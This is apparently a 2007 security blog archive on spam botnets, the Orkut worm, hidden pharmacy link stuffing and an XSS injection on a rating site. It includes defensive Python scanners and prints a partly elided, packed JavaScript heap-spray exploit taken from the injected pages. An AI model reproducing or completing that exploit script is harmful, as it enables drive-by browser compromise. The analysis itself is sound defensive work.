Archive for 2007


Christmas Storm

By Anonymous  •  December 28th, 2007  •   Spam

The Storm botnet has been quiet since its last spam run around Halloween. But on Christmas Eve the Storm botnet started spreading Christmas-themed email. The emails have similar content to previous Storm emails, with a short message and a link.

The link points to the following website, which advertises a strip show program. Clicking on the page will prompt the user to download stripshow.exe, which is the Storm bot.

At the time that these emails were first being sent, stripshow.exe was only detected by six of the 32 antivirus engines on VirusTotal.

The day after Christmas the theme of the emails changed to New Year. The emails have subjects such as:

  • New year wishes for you
  • New year ecard
  • Happy 2008
  • A fresh new year
  • Opportunities for the new year
  • Message for new year

We are currently still seeing these emails coming in.

Clicking the link will take you to the following page. The download does not start automatically, but clicking on the 'click here' link will prompt you to download happynewyear2008.exe, which is also the Storm bot.

These web sites are hosted on a fast-flux network of computers that have already been compromised by the Storm bot, making it very hard for anyone to take down the domains.


Celebrity bots sending image spam

By Anonymous  •  December 21st, 2007  •   Spam

Just after we posted our blog entry yesterday about the Pushdo/Celebrity botnet, another stream of celebrity malware-laden spam came in last night. As usual, the gang was using Angelina Jolie in the message.

If executed, the attachment downloads a spam bot and begins sending spam. Today the bot was sending out the following image spam at a considerable rate; we measured it at about 800 messages per hour.

Both the web sites heldbear.com and goodlone.com are hosting pages of an online drugstore called the Canadian Pharmacy. We checked the domain name registry and both sites were registered in China by someone named Liu Hai – which happens to be the name of a Chinese god of wealth and prosperity.


Pushdo: Malware Distribution Machine

By Anonymous  •  December 20th, 2007  •   Spam

A few days ago, a great analysis from SecureWorks on the Pushdo Trojan was published. The group behind this Trojan is none other than the Celebrity Gang, which we have commented on before as being a major spam player. Our observations indicate that this gang’s botnet is responsible for over 20% of spam at present.

Several interesting points came out of this analysis which illustrate the sophistication of this malware distribution mechanism:

  • The Pushdo Trojan itself is a downloader that seeks to download and install additional components from a remote server.
  • A custom HTTP protocol is used for communication instead of IRC.
  • The server distributes a number of malicious files, including spambots and password stealers.
  • The system is country ‘aware’, potentially limiting files to certain countries or groups of countries.
  • The malware keeps track of the computer’s IP address, hard drive serial number, OS version, and how many times a Pushdo variant has been run, which is presumably an anti-malware-analysis feature.
  • It also checks which anti-virus and firewall products are running. It doesn’t disable them, it just notes the processes and reports back to the server.

If the amount of spam this botnet is responsible for is anything to go by, the Pushdo/Celebrity gang has indeed succeeded in creating a sizeable botnet.


New Orkut worm takes us back in the wayback machine

By Anonymous  •  December 20th, 2007  •   Malware

I just love how old news is recycled with a bit of flair when it becomes relevant again. The latest Orkut worm reports talk about the technique the worm writer used to distribute its code. Quoting from the original article above: “It then downloads and executes a heavily obfuscated JavaScript”… looking at the code, I was expecting some whiz-bang brand-spankin-new cool-as-ice JS that you can’t even watch without eye protection. Alas, I was greeted with the good-ole’ “packed” obfuscation (see pdp’s post on it):

This brings us back to our August post on obfuscators (that are obviously easily detected and processed by us) which talked about the “packed” strand of JS obfuscation…

Hope that the industry will bring in something more exciting in the next wave of malicious code ;-)

Posted by Iftach Amit



E-card leads to spam bot download

By Anonymous  •  December 14th, 2007  •   Spam

This week we have been receiving spam emails that tell the recipient that they have received an ecard from Yahoo Greetings.

Clicking the link will take you to a forged americangreetings.com website. Both Internet Explorer 7.0 and Firefox browsers warn the user of a suspected phishing attempt.

If you ignore this warning you see the following page:

A message asks the user to update their flash player and provides a link to get the latest version. The link asks the user to download a malicious macromedia-flashplayerupdate.exe.

One of the main functions of this program is to send spam. We have observed it mass mailing e-card messages like the one above in order to lure more potential victims to the forged website. In addition to this it sends out short bursts of other types of spam. One type is this phishing spam:

Clicking the link will take you to the phishing website below that asks visitors to hand over personal details.

Another type of spam being sent was this:

We calculated that one of these spam bots will send out almost 1400 messages an hour. The spam bot operates in bursts, presumably pausing to periodically download new templates and address lists.


End of year spike in spam volume

By Anonymous  •  December 13th, 2007  •   Spam

As each year draws to a close, there is a consistent pattern of increased spamming activity, typically focused around Christmas spam.

In 2006, the traditional increase arrived early, thanks mainly to the effects of the Stration worm. Below is our Spam Volume Index (SVI) for the latter half of 2006; the SVI is a relative measure indicating the amount of spam being sent worldwide from week to week. As we can see, during October 2006 spam volumes increased by 40 – 50%, and this elevated level became the new norm for the New Year.

SVI 2006

2007 became the year of sophisticated botnets, novel spam ideas (PDF spam, for example) and the merging of malware and spam activities. In our SVI below we can see that, despite the changing landscape, the familiar end-of-year spike is here again. It's a little late this year, but is of a similar scale to last year.

Unfortunately, if past years are anything to go by, this new volume can be expected to be maintained by the spammers. While we can hope for a drop-off in early 2008, experience suggests that this might not happen.

SVI 2007


Legit websites host multiple exploits

By Anonymous  •  December 13th, 2007  •   Spam

Earlier this week we commented that malware was increasingly being spread via the web. Today we received this harmless looking email that doesn’t contain much other than a short message and a reference to a website. The website appears to serve two different functions, one is to increase the search rankings of other pages and the second is to install malware on a visitor’s computer.

The website appears to have nothing malicious about it; however, it is common for attackers to target high-profile and trusted websites. By not altering the look of the site, the attackers ensure that visitors will not even be aware of the malicious activity going on in the background.
We quickly discovered that this page is not as innocent as it looks: someone has added two separate bits of code to the front page, and each seems to serve a different purpose.

In the page source are almost 200 links to four websites with different variations of cialis and viagra references. An HTML tag at the start of the links tells the browser not to display them. This reduces the chance of someone noticing that the site is compromised, while still allowing search engines to read the links.
Most search engines use links from one website to increase the rank of the website being linked to. With enough compromised sites hosting links to a single website, that site can be given a higher ranking in a search engine. So if someone searches for ‘buy cialis online’, one of the sites pictured above may have enough links pointing to it to place it near or at the top of the search results, increasing the chance of the searcher going to that site.
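As an added example (not code from the original post), the following Python scanner implements the check a site owner would want for the hidden-link stuffing described above: it walks a page's HTML, collects the links that sit under an element hidden with display:none, visibility:hidden or the hidden attribute, and tallies the hosts they point to and how many carry the pharmacy keywords. The HTML sample, the hostnames and the keyword list are constructed for the demonstration.

```python
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
VOID_TAGS = {"br", "img", "meta", "link", "input", "hr"}   # never get a closing tag
KEYWORDS = ("cialis", "viagra")   # terms the compromised page was stuffed with


class HiddenLinkScanner(HTMLParser):
    """Sort every <a href> into visible or hidden, depending on its own and ancestors' styling."""
    def __init__(self):
        super().__init__()
        self.stack = []            # one bool per open element: is it hidden?
        self.hidden, self.visible = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        is_hidden = "hidden" in a or bool(HIDE_RE.search(a.get("style") or ""))
        if tag == "a" and a.get("href"):
            (self.hidden if is_hidden or any(self.stack) else self.visible).append(a["href"])
        if tag not in VOID_TAGS:
            self.stack.append(is_hidden)

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()


def scan(html):
    """Summarise hidden links: how many, which hosts they feed, and how many carry pharma terms."""
    s = HiddenLinkScanner()
    s.feed(html)
    hosts = Counter(urlparse(h).netloc for h in s.hidden)
    hits = sum(any(k in h.lower() for k in KEYWORDS) for h in s.hidden)
    return {"hidden": len(s.hidden), "visible": len(s.visible), "hosts": hosts, "keyword_hits": hits}


# Constructed sample page: two ordinary links plus a hidden block of pharmacy links.
SAMPLE_HTML = """<html><body>
<a href="/about">About us</a> <a href="http://partner.example/">Partner</a>
<div style="display:none">
<a href="http://pharm1.example/buy-cialis-online">cialis</a>
<a href="http://pharm1.example/cheap-viagra">viagra</a>
<a href="http://pharm2.example/viagra-pills">viagra online</a>
<a href="http://pharm2.example/cialis-soft-tabs">cialis</a>
<a href="http://pharm2.example/contact">contact</a>
</div></body></html>"""

if __name__ == "__main__":
    print(scan(SAMPLE_HTML))
```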

The second bit of code is a JavaScript section that contains more JavaScript that is encoded in an attempt to hide the script’s real function.

When this is run it adds more JavaScript to the page. The script appears to be trying to exploit eight different vulnerabilities. Six of these were targeting Microsoft Internet Explorer through vulnerabilities in various ActiveX controls. The other two were targeting the Apple QuickTime plug-in.

Many of these vulnerabilities have software patches available but it only takes one vulnerable piece of software to make you a victim of this type of attack. You should always make sure your browser and other software have the latest updates installed. Disabling JavaScript and ActiveX in your browser can also reduce the chance of a successful attack.


Stock Spam II: Return of the Image

By Anonymous  •  December 13th, 2007  •   Spam

We have not seen much from the stock spammers lately. Stock spam levels have recently dwindled to almost insignificant levels:

But today, to our surprise, we saw a return of image stock spam which we have not seen for some months now. The numbers, while not huge, are significant. Moreover, the style of the message structure and image, complete with colorful randomized words, is identical to that seen earlier in the year. It seems the stock spammers, after a considerable underground hiatus, have picked up their tools and started again. Whether it will be a long-lived phenomenon, or the final death throes of stock spam, remains to be seen.


The Traffic Stock Exchange

By Anonymous  •  December 10th, 2007  •   Cybercrime Malware Vulnerabilities

There is nothing new in traffic-selling sites; in fact this growing business is almost as old as search engines. This huge market was adopted by hackers in order to transform desktops and sites under their control into cash-making zombies. Sites that run crimeware affiliation networks are nothing new, and we have been covering them for a long time both on this blog and in our regular publications (Malicious Page of the Month, and the Trends Reports), but we just had to highlight this one…

While analyzing some malicious traffic we found a site called “robotraff.com”. This site is a marketplace for traffic buyers and sellers which claims to be a “stock exchange” for traffic: ”robotraff is the first automated stock exchange of the traffic, here you can buy the traffic by criteria interesting you and also to sell – under the price favorable to you.” [Quote from robotraff.com]


[Note the English mistakes; original image taken from the robotraff.com website.]

This sounds very good: the seller can use his site to gain some extra income and the buyer can control the traffic he gets. This evolution enables every site owner to get into the business of buying and selling traffic.

The technical process is fairly simple: the seller adds an iframe (or script) that redirects his visitors’ browsers to robotraff, which in turn redirects the browser to the traffic buyer’s site.

This all sounds great, BUT (remember, we found this site while analyzing malicious code) this site has another property that raised our suspicion regarding the intended customers: the ability to buy traffic that corresponds specifically to a browser type and version…

Sure enough, when crawling through the site list of one of the sellers (see partial list below) we found a treasure trove of exploits. It was like going through a time machine or an exploit museum: we found exploits dating all the way back to 2001 along with modern, alive-and-kicking exploits.

The attack is simple: the selling site had a hidden iframe pointing (through a redirect) to robotraff. Robotraff then redirected the browser to the traffic buyer’s site, which in turn served malicious content.

Wonder what the ethics are for “shareholders” in this stock exchange, and what regulations are associated with running a stock there ;-)

Posted by Golan Yosef



Rated M for Malicious (RBN hit again?)

By Anonymous  •  December 9th, 2007  •   Cybercrime Malware

Rateitall.com has a permanent XSS hole which was used by a criminal group (or groups?) to insert malicious code into the popular rating site.

The XSS attack appears in many of the site’s pages and can be identified by the “clever” review text, “it is good tt” followed by some random characters, and by the random-looking user name.

The attackers, using the said XSS hole, added a script tag with an “SRC” attribute pointing to “a34[REMOVED].info”.

[Screenshot of one such review: dated 11/15/2007, text “it is good”, posted by user “tti96”]


Another thing to note here is that the attackers (probably) managed to automatically generate users (since for each XSS attack a new user was created) which means that they managed to overcome the “Captcha” mechanism employed by Rate-It-All.
The injected obfuscated scripts attempt to exploit some IE vulnerabilities, such as the ANI vulnerability and MDAC:
```javascript
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?
String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)
{d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d=1d;d.3("");
d.3("<"+"G>");d.3("h 6 = \\"1h://O.S/Z/1D.26\\";");d.3("h j = \\\'\\\';");d.3("D (i = 0; i < 6.7; )");
d.3("{");d.3("j += \\\'%u\\\' + ((i+1<6.7)?6.r(i+1).q(16):\\\'1E\\\')+6.r(i).q(16);");d.3("i = i + 2;");
d.3("}");d.3("w = g(\\"%f%f%1C%1F%1G%1J%1I%1H%1B%…"\\");");d.3("F = g(j);");
d.3("h l = w+F;");d.3("5 = g(\\"%f%f\\");");d.3("J = 20;");d.3("a = J+l.7;");d.3("C (5.7d.3("B = 5.I(0, a);");d.3("8 = 5.I(0, 5.7-a);");d.3("C(8.7+a<3m) 8 = 8+8+B;");d.3("E = 3i 3j();");
d.3("D (i=0;i<2S;i++) E[i] = 8 + l;");d.3("");d.3("");
d.3("");d.3("");',62,212,'|||write|uefef|bigblock|…[REMOVED]…|ubdb4'.split('|'),0,{}))
```
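The Orkut worm post above and this injected script both rely on the same “p,a,c,k,e,d” packer (the `eval(function(p,a,c,k,e,d){…}` wrapper with a radix, a word count and a pipe-separated word list). As an added example, not code from the original page, here is a Python unpacker that reverses the word substitution offline without evaluating any JavaScript, which is how an analyst gets at the real script before deciding what it exploits. The packed sample is constructed for the demonstration and is not the script from rateitall.

```python
import re

# Matches the eval(function(p,a,c,k,e,d){...}('payload',radix,count,'w|o|r|d|s'.split('|'),0,{}))
# wrapper that the packer emits.
PACKED_RE = re.compile(
    r"eval\(function\(p,a,c,k,e,d\)\{.*?\}\('(?P<p>.*)',(?P<a>\d+),(?P<c>\d+),"
    r"'(?P<k>.*?)'\.split\('\|'\),\d+,\{\}\)\)", re.S)

BASE36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_index(n, radix):
    """Reproduce the packer's e(c): base-radix digits 0-9, a-z, then A-Z (chr(d + 29))."""
    digits = ""
    while True:
        n, d = divmod(n, radix)
        digits = (chr(d + 29) if d > 35 else BASE36[d]) + digits
        if n == 0:
            return digits


def unpack_payload(payload, radix, count, words):
    """Undo the packer's word-boundary replacement of each token with k[i], running no JS."""
    table = {encode_index(i, radix): words[i] for i in range(min(count, len(words))) if words[i]}
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), payload)


def unpack(packed_js):
    """Extract the four packer arguments from the wrapper and return the original source."""
    m = PACKED_RE.search(packed_js)
    if not m:
        raise ValueError("not a p,a,c,k,e,d packer wrapper")
    # The payload is a JS single-quoted literal; the packer only escapes ' and \ inside it.
    payload = re.sub(r"\\(['\\])", r"\1", m.group("p"))
    return unpack_payload(payload, int(m.group("a")), int(m.group("c")), m.group("k").split("|"))


# Constructed sample (not the script from the page): it packs
# document.write('hello');var x=document.location; with a five-word dictionary.
SAMPLE = (
    "eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+"
    "((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String))"
    "{while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};"
    "c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}"
    "('0.1(\\'2\\');3 x=0.4;',62,5,'document|write|hello|var|location'.split('|'),0,{}))"
)

if __name__ == "__main__":
    print(unpack(SAMPLE))
```

The same routine applies to the rateitall script once its elided parts are available: the 62 and 212 in its trailer are the radix and word count that `unpack` reads.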
The downloaded exe file was identified by only 2 of the AV engines available at VirusTotal:

The “a34[REMOVED].info” domain was registered on 13-11-2007 to an entity in Culver City, California (although the country was stated as CM, the phone number area code points to CA), is hosted in the UK and was registered through “Regtime Ltd”, a Russian domain registration company. Its domain servers are NS0.HQHOST.NET and NS1.HQHOST.NET, which were used by other notorious sites.
A further 30 domains are registered under the same IP address as “a34[REMOVED].info”.

It’s interesting to note that although the hosting company’s site (hqhost.net) looks completely “Americanized”, the link we found in one of their support forums for contacting support is, surprisingly enough, in Russian:

12/6/2007 – update – rateitall has reported that they have fixed the XSS issue and purged the malicious pages from their website.
Posted by Golan Yosef
